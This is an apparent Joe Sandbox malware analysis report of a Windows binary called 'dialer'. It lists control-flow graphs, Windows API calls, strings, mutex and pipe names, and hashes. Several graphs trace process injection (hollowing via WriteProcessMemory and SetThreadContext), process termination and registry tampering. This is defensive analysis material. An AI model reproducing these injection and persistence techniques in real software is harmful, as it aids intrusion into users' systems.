                                                                          • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                          • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                          • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                            • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                            • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                            • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                            • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                            • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                                          • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                          • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                                          • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                          • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                          • String ID:
                                                                          • API String ID: 1323846700-0
                                                                          • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                          • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                          • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                          • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                                          Control-flow Graph

                                                                          control_flow_graph 173 1400018ac-1400018d6 OpenProcess 174 140001901-140001912 173->174 175 1400018d8-1400018e8 IsWow64Process 173->175 176 1400018f8-1400018fb CloseHandle 175->176 177 1400018ea-1400018f3 175->177 176->174 177->176
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseHandleOpenWow64
                                                                          • String ID:
                                                                          • API String ID: 10462204-0
                                                                          • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                          • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                          • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                          • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                                                                          Control-flow Graph

                                                                          control_flow_graph 178 140002258-14000225c call 14000226c 180 140002261-140002263 ExitProcess 178->180
                                                                          APIs
                                                                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                            • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                            • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                            • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                            • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                            • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                            • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                            • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                            • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                            • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                            • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                            • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                            • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                            • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                            • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                          • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                          • String ID:
                                                                          • API String ID: 3836936051-0
                                                                          • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                          • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                          • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                          • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                          Control-flow Graph

                                                                          control_flow_graph 189 140002560-14000258c 190 140002592 189->190 191 14000273a-140002742 189->191 192 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 190->192 193 140002598-14000259f 190->193 194 140002748-14000274b 191->194 195 14000297e-1400029a2 ReadFile 191->195 196 140002a74-140002a8e 192->196 198 140002704-140002715 192->198 199 1400025a5-1400025a8 193->199 200 1400026bd-1400026bf ExitProcess 193->200 201 140002751-140002756 194->201 202 140002974-140002979 call 14000175c 194->202 195->196 197 1400029a8-1400029af 195->197 197->196 206 1400029b5-1400029c9 call 1400018ac 197->206 198->196 207 14000271b-140002733 call 1400010c0 198->207 208 1400025ae-1400025b1 199->208 209 140002660-14000268b RegOpenKeyExW 199->209 203 140002919-14000292c call 140001944 201->203 204 14000275c-14000275f 201->204 202->196 203->196 231 140002932-140002941 call 140001944 203->231 210 140002761-140002766 204->210 211 14000279d-1400027ae call 140001944 204->211 206->196 229 1400029cf-1400029d5 206->229 232 140002735 207->232 218 140002651-14000265b 208->218 219 1400025b7-1400025ba 208->219 216 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 209->216 217 14000268d-14000269b RegDeleteValueW 209->217 210->196 220 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 210->220 211->196 240 1400027b4-1400027d6 ReadFile 211->240 216->196 217->216 218->196 226 140002644-14000264c 219->226 227 1400025c0-1400025c5 219->227 226->196 227->196 234 1400025cb-1400025ef ReadFile 227->234 238 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 229->238 239 140002a5f 229->239 231->196 255 140002947-14000296f ShellExecuteW 231->255 232->196 234->196 236 1400025f5-1400025fc 234->236 236->196 243 140002602-140002616 call 1400018ac 236->243 258 140002a18-140002a1e 238->258 259 140002a49-140002a4f GetProcessHeap 238->259 245 140002a66-140002a6f call 140002a90 239->245 240->196 247 1400027dc-1400027e3 240->247 243->196 264 14000261c-140002622 243->264 245->196 247->196 254 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 247->254 260 14000290b-140002914 GetProcessHeap 254->260 261 14000282d-140002839 254->261 255->196 258->259 265 140002a20-140002a32 258->265 262 140002a52-140002a5d HeapFree 259->262 260->262 261->260 266 14000283f-14000284b 261->266 262->196 268 140002624-140002633 call 1400010c0 264->268 269 140002638-14000263f 264->269 270 140002a34-140002a36 265->270 271 140002a38-140002a40 265->271 266->260 272 140002851-14000285c 266->272 268->196 269->245 270->271 276 140002a44 call 1400016cc 270->276 271->259 277 140002a42 271->277 273 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 272->273 274 14000285e-140002869 272->274 273->260 274->260 278 14000286f-14000287c call 140001c88 274->278 276->259 277->265 278->260
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                          • String ID: SOFTWARE$dialerstager$open
                                                                          • API String ID: 3276259517-3931493855
                                                                          • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                                          • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                          • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                                          • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                                                                          Control-flow Graph

                                                                          control_flow_graph 285 140001c88-140001cb8 286 140001cbb-140001cc8 285->286 287 140001e8c-140001e91 286->287 288 140001cce-140001d25 CreateProcessW 286->288 287->286 291 140001e97 287->291 289 140001e88 288->289 290 140001d2b-140001d5a VirtualAllocEx 288->290 289->287 292 140001e5d-140001e60 290->292 293 140001d60-140001d7b WriteProcessMemory 290->293 294 140001e99-140001eb9 291->294 295 140001e62-140001e76 OpenProcess 292->295 296 140001e85 292->296 293->292 297 140001d81-140001d87 293->297 295->289 298 140001e78-140001e83 TerminateProcess 295->298 296->289 299 140001dd2-140001def VirtualAlloc 297->299 300 140001d89 297->300 298->289 299->292 301 140001df1-140001e07 GetThreadContext 299->301 302 140001d8c-140001dba WriteProcessMemory 300->302 301->292 304 140001e09-140001e2e WriteProcessMemory 301->304 302->292 303 140001dc0-140001dcc 302->303 303->302 305 140001dce 303->305 304->292 306 140001e30-140001e4c SetThreadContext 304->306 305->299 306->292 307 140001e4e-140001e5b ResumeThread 306->307 307->292 308 140001eba-140001ebf 307->308 308->294
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                          • String ID: @
                                                                          • API String ID: 3462610200-2766056989
                                                                          • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                          • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                          • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                          • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                          • String ID: dialersvc64
                                                                          • API String ID: 4184240511-3881820561
                                                                          • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                          • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                          • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                          • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Delete$CloseEnumOpen
                                                                          • String ID: SOFTWARE\dialerconfig
                                                                          • API String ID: 3013565938-461861421
                                                                          • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                          • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                          • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                          • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: File$Write$CloseCreateHandle
                                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                                          • API String ID: 148219782-3440882674
                                                                          • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                          • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                          • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                          • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: ntdll.dll
                                                                          • API String ID: 1646373207-2227199552
                                                                          • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                          • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                          • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                          • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                          Execution Graph

                                                                          Execution Coverage:2.4%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:826
                                                                          Total number of Limit Nodes:2

                                                                          Callgraph


                                                                          Control-flow Graph

                                                                          APIs
                                                                          • NtQueryInformationProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: InformationProcessQuery
                                                                          • String ID:
                                                                          • API String ID: 1778838933-0
                                                                          • Opcode ID: 6751f840f2f5aebd6751d524e6efc601c9bb43c772484294e188eecfbad3158e
                                                                          • Instruction ID: db77473c3d931d0fcdff88eb00413d93014a399b348e2779a93e53daa222875a
                                                                          • Opcode Fuzzy Hash: 6751f840f2f5aebd6751d524e6efc601c9bb43c772484294e188eecfbad3158e
                                                                          • Instruction Fuzzy Hash: 0BF0AFB2608B408AEA12DF52F89579A77A0F38D7C0F00991ABBC843735DB3CC190CB40

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen$wcscatwcscpywcsncmp
                                                                          • String ID: 0$X$\BaseNamedObjects\krwgvaizwkrekxljjkewdlmp$`
                                                                          • API String ID: 597572034-4019176162
                                                                          • Opcode ID: c600c716e08e094fafbff1190e846a4c8af8233fcc056b851a4b5868120616ec
                                                                          • Instruction ID: 6d2fbcda24ca89716a86bde41687ff7fffd3aad73cb8576b26b5126aeab97ea9
                                                                          • Opcode Fuzzy Hash: c600c716e08e094fafbff1190e846a4c8af8233fcc056b851a4b5868120616ec
                                                                          • Instruction Fuzzy Hash: 5F1248B2608BC481E762CB16F8443EAB7A4F789794F414215EBA857BF5EF78C189C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                          • String ID:
                                                                          • API String ID: 2643109117-0
                                                                          • Opcode ID: f4770097703a93e6ebc2b28b43cd9dde9cff56eadf7c464ec9f392a7b96236ef
                                                                          • Instruction ID: f5b649809ecdb1e3254532f3c56674770b0d491324e0a3fa73df4e492b336c57
                                                                          • Opcode Fuzzy Hash: f4770097703a93e6ebc2b28b43cd9dde9cff56eadf7c464ec9f392a7b96236ef
                                                                          • Instruction Fuzzy Hash: DA5122B1A11A4085FB16EF27F9947EA27A5AB8D7D0F808121FB4D873B6DE38C4958300

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C30,0000000140007C30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C30,0000000140007C30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                          • memcpy.MSVCRT ref: 0000000140001CE0
                                                                          • GetLastError.KERNEL32(?,?,?,?,0000000140007C30,0000000140007C30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                          • API String ID: 2595394609-2123141913
                                                                          • Opcode ID: 2308ca6eaf7bf6aa6e5fd7c2dad65274fa0cdee15cec1e8ea3a4e6064b89d7b3
                                                                          • Instruction ID: 43a0cbb6118ac9185dba083df37bfa5a8251914ca7472923389a44b33500f4d1
                                                                          • Opcode Fuzzy Hash: 2308ca6eaf7bf6aa6e5fd7c2dad65274fa0cdee15cec1e8ea3a4e6064b89d7b3
                                                                          • Instruction Fuzzy Hash: BC4153F1601A4486FA26DF47F884BE927A0E78DBC4F584122EF0E877B1DA38C586C300

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 926137887-0
                                                                          • Opcode ID: d9a872710ed99017faa0aba6aa6fc20f036904564ea786093dba8e779631c78c
                                                                          • Instruction ID: a4e62dc8e7d81a00801526d2a511ced90750e179f40fb15ec58be7477c50376c
                                                                          • Opcode Fuzzy Hash: d9a872710ed99017faa0aba6aa6fc20f036904564ea786093dba8e779631c78c
                                                                          • Instruction Fuzzy Hash: F221E3B0715A0292FA1BDB53F9483E92360B76CBD0F444161EB1E47AB4DB7A8986C300

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                          • API String ID: 544645111-395989641
                                                                          • Opcode ID: 0e7c40df18b2d889cb18027e33d092cab4b671df9256c1c141fb24a14e92ca32
                                                                          • Instruction ID: 2d94c89a0dbc5eaf2f8d64577ab743d1a622af76d4dc519d29f5ea4fbe6584bb
                                                                          • Opcode Fuzzy Hash: 0e7c40df18b2d889cb18027e33d092cab4b671df9256c1c141fb24a14e92ca32
